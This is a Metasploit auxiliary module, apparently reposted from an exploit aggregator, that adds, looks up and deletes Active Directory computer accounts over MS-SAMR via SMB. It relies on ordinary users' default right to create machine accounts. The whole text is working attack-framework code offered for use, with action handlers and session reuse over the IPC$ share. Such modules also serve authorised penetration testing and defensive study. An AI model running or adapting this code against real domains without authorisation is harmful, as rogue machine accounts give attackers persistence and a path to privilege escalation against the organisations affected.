Share
## https://sploitus.com/exploit?id=PACKETSTORM:180776
##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'ruby_smb/dcerpc/client'  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::SMB::Client::Authenticated  
include Msf::Exploit::Remote::DCERPC  
include Msf::Auxiliary::Report  
include Msf::Exploit::Remote::MsSamr::Computer  
include Msf::OptionalSession::SMB  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'SAMR Computer Management',  
'Description' => %q{  
Add, lookup and delete computer / machine accounts via MS-SAMR. By default  
standard active directory users can add up to 10 new computers to the  
domain. Administrative privileges however are required to delete the  
created accounts.  
},  
'License' => MSF_LICENSE,  
'Author' => [  
'JaGoTu', # @jagotu Original Impacket code  
'Spencer McIntyre',  
],  
'References' => [  
['URL', 'https://github.com/SecureAuthCorp/impacket/blob/master/examples/addcomputer.py'],  
],  
'Notes' => {  
'Reliability' => [],  
'Stability' => [],  
'SideEffects' => [ IOC_IN_LOGS ]  
},  
'Actions' => [  
[ 'ADD_COMPUTER', { 'Description' => 'Add a computer account' } ],  
[ 'DELETE_COMPUTER', { 'Description' => 'Delete a computer account' } ],  
[ 'LOOKUP_COMPUTER', { 'Description' => 'Lookup a computer account' } ]  
],  
'DefaultAction' => 'ADD_COMPUTER'  
)  
)  
  
register_options([  
OptString.new('COMPUTER_PASSWORD', [ false, 'The password for the new computer' ], conditions: %w[ACTION == ADD_COMPUTER]),  
Opt::RPORT(445)  
])  
end  
  
def run  
send("action_#{action.name.downcase}")  
rescue MsSamrConnectionError => e  
fail_with(Failure::Unreachable, e.message)  
rescue MsSamrAuthenticationError => e  
fail_with(Failure::NoAccess, e.message)  
rescue MsSamrNotFoundError => e  
fail_with(Failure::NotFound, e.message)  
rescue MsSamrBadConfigError => e  
fail_with(Failure::BadConfig, e.message)  
rescue MsSamrUnexpectedReplyError => e  
fail_with(Failure::UnexpectedReply, e.message)  
rescue MsSamrUnknownError => e  
fail_with(Failure::Unknown, e.message)  
end  
  
def action_add_computer  
with_ipc_tree do |opts|  
add_computer(opts)  
end  
end  
  
def action_delete_computer  
fail_with(Failure::BadConfig, 'This action requires COMPUTER_NAME to be specified.') if datastore['COMPUTER_NAME'].blank?  
with_ipc_tree do |opts|  
delete_computer(opts)  
end  
end  
  
def action_lookup_computer  
fail_with(Failure::BadConfig, 'This action requires COMPUTER_NAME to be specified.') if datastore['COMPUTER_NAME'].blank?  
with_ipc_tree do |opts|  
lookup_computer(opts)  
end  
end  
  
# @yieldparam options [Hash] If a SMB session is present, a hash with the IPC tree present. Empty hash otherwise.  
# @return [void]  
def with_ipc_tree  
opts = {}  
if session  
print_status("Using existing session #{session.sid}")  
client = session.client  
self.simple = ::Rex::Proto::SMB::SimpleClient.new(client.dispatcher.tcp_socket, client: client)  
opts[:tree] = simple.client.tree_connect("\\\\#{client.dispatcher.tcp_socket.peerhost}\\IPC$")  
end  
  
yield opts  
ensure  
opts[:tree].disconnect! if opts[:tree]  
end  
end